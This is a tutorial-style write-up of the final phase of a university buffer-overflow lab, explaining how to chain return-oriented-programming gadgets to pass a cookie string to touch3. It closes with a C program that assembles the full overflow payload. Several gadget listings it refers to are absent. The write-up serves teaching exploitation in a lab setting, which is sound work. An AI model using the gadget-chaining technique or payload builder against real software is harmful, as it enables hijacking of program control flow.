Phase 5: Gadget Chaining

Now it's time for the final phase. You don't have to be a genius to get this far, so good for you. While the spec says that this phase calls for a lot more effort than the points it's worth, it really isn't that bad, so don't be a quitter. Google doesn't hire quitters.


The basics of this phase are the same as those of phase 3: we need to reach touch3 with the address of a cookie string in %rdi. Once again, we have to worry about offsetting from a known address to find a location to store this cookie string, and that is what the majority of this challenge deals with.

Let's start off by taking a look at the additional gadgets we've been given:


As a review of movl's effect on the upper bytes of a register: it zeroes them out, so whatever value you're moving doesn't get polluted by the data that was previously in the destination register's upper 32 bits.

Now it's time to make a plan for the phase. We know that we need to add some offset value to a known address near the top of the buffer. We also know that we'll need to get the address of the string at that location into %rdi.

To start off, we'll take a look at the gadgets that have been made available to us. I won't reproduce the entire gadget farm here since it's like 3 frickin' pages, but I'll clip out the important gadgets. The first thing to take note of is the special leaq right after the mid_farm marker:


This leaq adds the values of %rdi and %rsi together and places their sum in %rax. As a result, we now have a way to produce our offset address, and we know we must place the base address and the offset into %rdi and %rsi.

Since the gadget addresses themselves take up room on the stack, we won't know the exact offset value until we've laid our whole chain out. Let's start by trying to get a known address into one of the registers above.

The easiest address to work with is probably just the value of %rsp itself. When the first gadget executes, %rsp points just past the slot where getbuf's old return address was (getbuf's ret has already popped that slot). Knowing this, we need to look for a way to move %rsp into %rdi or %rsi. Unfortunately, this lab is mean, so neither of those gadgets exists. Once again we'll look for the next best thing and move %rsp into another register:


The 48 89 e0 at 40192e is an encoding of movq %rsp, %rax. So now we have to take a look and see if we have a way to get the value in %rax into a register that we want. A couple of Ctrl+Fs show you that, amen hallelujah, we do:


The 48 89 c7 at 4018a5 is an encoding of movq %rax, %rdi. So now we have a known address in one of the registers we need. The next step is to get our offset into the other register. Of course we don't know what that offset is yet, but we'll just work out the register manipulation and fill the value in later. Assuming we'll have to store the offset on the stack somewhere, we can use the same technique as in phase 4:


The 58 (popq %rax) will place our offset into %rax. Because of the way this lab is designed, we'll find that trying to get this value into %rsi is a major hassle and leaves you with:

In the order shown above, we have encodings to move %eax into %ecx, %ecx into %edx, and, finally, %edx into %esi. We switch to the 32-bit registers because it's easier to find encodings for them, and that is safe here: each movl zeroes the upper 32 bits of its destination, and our offset is a small positive value, so %rsi ends up holding exactly the offset.

Now that we have the known address and the offset in the correct registers, we can apply the leaq to get the final address into %rax. The last step is to get that value from %rax into %rdi, using the second gadget from earlier in this phase.

A word of advice: be careful when you're writing these solutions down, otherwise you'll end up staring at the assembly for an hour, wondering how many puppies you must've killed in a past life to be sentenced to this suffering, when, in reality, you just counted wrong because you're a college student with the mental acuity of a first grader. Not speaking from personal experience, of course.


The last step is to find the offset. Writing your solution down first is really helpful here. The offset is the distance from the slot %rsp pointed at while the first gadget ran (the slot holding the second gadget's address) to the start of the cookie string, so count the 8-byte slots in between: the movq %rax,%rdi gadget, the popq %rax gadget, the offset constant itself, the three movl gadgets, the leaq gadget, the final movq %rax,%rdi gadget, and the address of touch3. That is nine slots, so you should end up with an offset of 72 bytes, or 0x48. This leaves us with a solution that looks like:

Breaking this down into an overly complicated stack analysis, we can see that, once again, we have our default stack structure after gets returns, with our buffer overflow set up:

Once getbuf returns, the program will execute our first gadget, which copies the value of %rsp into %rax:

Now %rax contains the address of the slot just past the overwritten return address (the slot holding our second gadget's address, since the first gadget's own address was popped by getbuf's ret before the movq ran), and %rsp has moved on to that second gadget, which will copy the address from %rax into %rdi:

As we can see, the address is now in %rdi and %rsp is ready to execute the third gadget, a popq %rax:

After that pop instruction, the offset (0x48) is in %rax, and the next few gadgets will move this value along until it's in %rsi:

Now that our values have been placed in the correct registers, we're ready to execute the leaq instruction to compute our full address:

The leaq has now executed and the complete address (base plus offset) has been placed in %rax. The final gadget will now move this address into %rdi:

The address of the cookie string is now in %rdi, and our program is finally ready to enter touch3 and solve the phase.
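As an added example (not part of the original write-up), here is a small C builder that lays out exactly the chain walked through above and derives the 0x48 offset by counting slots instead of by hand, so the "you just counted wrong" failure mode goes away. Only the two gadget addresses the write-up cites (0x40192e for movq %rsp,%rax and 0x4018a5 for movq %rax,%rdi) are real; every other gadget address, the 40-byte padding, and the cookie string are placeholders/assumptions that you replace with values from your own rtarget listing and cookie.txt. The program prints the payload as space-separated hex bytes, the text form the lab's hex2raw tool consumes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SLOT 8        /* one 8-byte stack slot per gadget address or constant */
#define MAX_WORDS 16

/* Gadget addresses for the chain. Only mov_rsp_rax and mov_rax_rdi are the
 * encodings the write-up points at; the rest are placeholders (0) that must be
 * filled in from your own `objdump -d rtarget` output. */
typedef struct {
    uint64_t mov_rsp_rax;   /* 48 89 e0 : movq %rsp,%rax ; ret   (0x40192e) */
    uint64_t mov_rax_rdi;   /* 48 89 c7 : movq %rax,%rdi ; ret   (0x4018a5) */
    uint64_t pop_rax;       /* 58       : popq %rax      ; ret   (placeholder) */
    uint64_t mov_eax_ecx;   /* movl %eax,%ecx ; ret              (placeholder) */
    uint64_t mov_ecx_edx;   /* movl %ecx,%edx ; ret              (placeholder) */
    uint64_t mov_edx_esi;   /* movl %edx,%esi ; ret              (placeholder) */
    uint64_t lea_rdi_rsi;   /* leaq (%rdi,%rsi,1),%rax ; ret, after mid_farm */
    uint64_t touch3;        /* address of touch3                 (placeholder) */
} gadgets_t;

/* Lay the chain out in stack order (lowest address first). Returns the number
 * of words and records which slot holds the popped offset constant, which is
 * patched once the chain length is known. */
static size_t build_chain(const gadgets_t *g, uint64_t words[MAX_WORDS], size_t *const_slot)
{
    size_t n = 0;
    words[n++] = g->mov_rsp_rax;  /* %rax <- %rsp, which points at slot 1 */
    words[n++] = g->mov_rax_rdi;  /* %rdi <- captured stack address */
    words[n++] = g->pop_rax;      /* %rax <- the constant in the next slot */
    *const_slot = n;
    words[n++] = 0;               /* offset constant, patched in build_payload */
    words[n++] = g->mov_eax_ecx;  /* movl chain: each step zeroes the upper 32 bits */
    words[n++] = g->mov_ecx_edx;
    words[n++] = g->mov_edx_esi;  /* %rsi <- offset */
    words[n++] = g->lea_rdi_rsi;  /* %rax <- %rdi + %rsi = address of the string */
    words[n++] = g->mov_rax_rdi;  /* %rdi <- that address */
    words[n++] = g->touch3;       /* "return" into touch3 */
    return n;                     /* the cookie string starts at slot n */
}

/* getbuf's ret pops slot 0 before the movq %rsp,%rax runs, so %rax holds the
 * address of slot 1; the string sits at slot n, (n - 1) slots further on. */
static uint64_t cookie_offset(size_t nwords)
{
    return (uint64_t)(nwords - 1) * SLOT;
}

static void put_le64(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++) dst[i] = (uint8_t)(v >> (8 * i));
}

/* Assemble padding + chain + NUL-terminated cookie string into `out`.
 * `pad` is the distance from the start of getbuf's buffer to its saved return
 * address (student-specific; read it off getbuf's `sub $N,%rsp`).
 * Returns the payload length, or 0 if it does not fit in `cap`. */
size_t build_payload(const gadgets_t *g, size_t pad, const char *cookie,
                     uint8_t *out, size_t cap)
{
    uint64_t words[MAX_WORDS];
    size_t const_slot, n = build_chain(g, words, &const_slot);
    size_t slen = strlen(cookie) + 1;          /* touch3 compares a C string: keep the NUL */
    size_t total = pad + n * SLOT + slen;
    if (total > cap) return 0;

    words[const_slot] = cookie_offset(n);      /* 0x48 for this ten-word chain */
    memset(out, 0, pad);                       /* filler: any bytes except '\n' (Gets stops there) */
    for (size_t i = 0; i < n; i++) put_le64(out + pad + i * SLOT, words[i]);
    memcpy(out + pad + n * SLOT, cookie, slen);
    return total;
}

int main(void)
{
    /* Assumed values: 40-byte padding and a constructed cookie "12345678". */
    gadgets_t g = { 0x40192e, 0x4018a5, 0, 0, 0, 0, 0, 0 };
    uint8_t buf[256];
    size_t len = build_payload(&g, 40, "12345678", buf, sizeof buf);
    for (size_t i = 0; i < len; i++)
        printf("%02x%c", buf[i], ((i + 1) % 8) ? ' ' : '\n');
    putchar('\n');
    return 0;
}
```

Pipe the output through hex2raw as usual. If you add or remove a gadget from the chain, cookie_offset changes with it automatically, which is the whole point of letting the code count the slots.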